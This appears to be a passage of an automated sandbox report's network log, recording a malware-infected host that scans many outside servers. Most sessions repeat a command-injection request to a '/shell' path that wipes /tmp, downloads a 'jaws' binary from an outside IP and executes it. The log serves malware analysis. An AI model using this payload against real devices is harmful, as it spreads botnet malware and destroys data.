                                                          Jan 2, 2024 06:23:59.400872946 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:59.795567989 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:23:59 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:59 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 34 62 66 35 38 63 61 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 39 26 23 34 36 3b 36 65 33 62 61 65 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;64bf58ca&#46;1704173039&#46;6e3bae6</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.235221849.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:59.870449066 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:59Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.235224249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:00.552783966 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:59Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.235823213.52.177.10080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:00.958031893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.119976044 CET242INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Content-Type: application/json; charset=utf-8
                                                          Connection: keep-alive
                                                          Content-Length: 48
                                                          X-Kong-Response-Latency: 0
                                                          Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 6e 6f 20 52 6f 75 74 65 20 6d 61 74 63 68 65 64 20 77 69 74 68 20 74 68 6f 73 65 20 76 61 6c 75 65 73 22 7d
                                                          Data Ascii: {"message":"no Route matched with those values"}


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          73192.168.2.2333472104.25.41.24980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.079195023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          74192.168.2.2338590104.23.98.20480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.079299927 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.2350906197.15.56.18080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.084127903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.2348156104.107.146.11780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.091301918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.384999037 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 65 34 35 31 35 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 31 26 23 34 36 3b 35 66 37 37 34 36 30 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8e451502&#46;1704173041&#46;5f774609</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.2358458104.73.17.2780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.120239973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.281836033 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 38 61 37 38 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 31 26 23 34 36 3b 33 66 33 35 61 38 33 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;378a7868&#46;1704173041&#46;3f35a83c</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.233437238.181.35.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.259877920 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.561696053 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.235226049.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.261372089 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:00Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.235650445.148.36.4280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.272066116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.509753942 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request
                                                          Jan 2, 2024 06:24:01.709047079 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.2357970109.109.200.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.322258949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.565769911 CET503INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Content-Length: 309
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 76 6d 65 69 73 74 65 72 2e 77 72 73 2e 65 63 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at pvmeister.wrs.eco Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.2355542184.85.129.25180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.334667921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.590534925 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 33 34 32 64 62 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 31 26 23 34 36 3b 33 61 32 38 65 62 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d342db17&#46;1704173041&#46;3a28eb26</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.234257885.215.117.2480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.338021040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.597176075 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.2338402143.0.84.21080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.350137949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.623958111 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Server: Apache
                                                          Vary: accept-language
                                                          Accept-Ranges: bytes
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Language: en
                                                          Expires: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 64 66 64 66 64 66 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 76 68 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2c 20 55 62 75 6e 74 75 2c 20 22 46 69 72 61 20 53 61 6e 73 22 2c 20 22 44 72 6f 69 64 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 30 70 78 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 76 68 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Bad request!</title><style type="text/css">.../*--><![CDATA[/*>...*/ * { padding:0; margin:0; vertical-align:baseline; list-style:none; border:0 } body { color: #000000; background-color: #dfdfdf; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 80vh; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; text-align: center; } h1 { font-size: 150px; font-family: sans-serif; } h2{ font-size: 50px; } p { margin-top: 25px; width: 60vh; font-siz
                                                          Jan 2, 2024 06:24:01.623970032 CET251INData Raw: 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e
                                                          Data Ascii: e: 20px; text-align: center; }/*...*/--></style></head><body> <h1>400</h1> <h2>Bad request!</h2><p> Your browser (or proxy) sent a request that this server could not understand.</p><p></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.23587268.217.69.18080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:01.420268059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:01.721061945 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
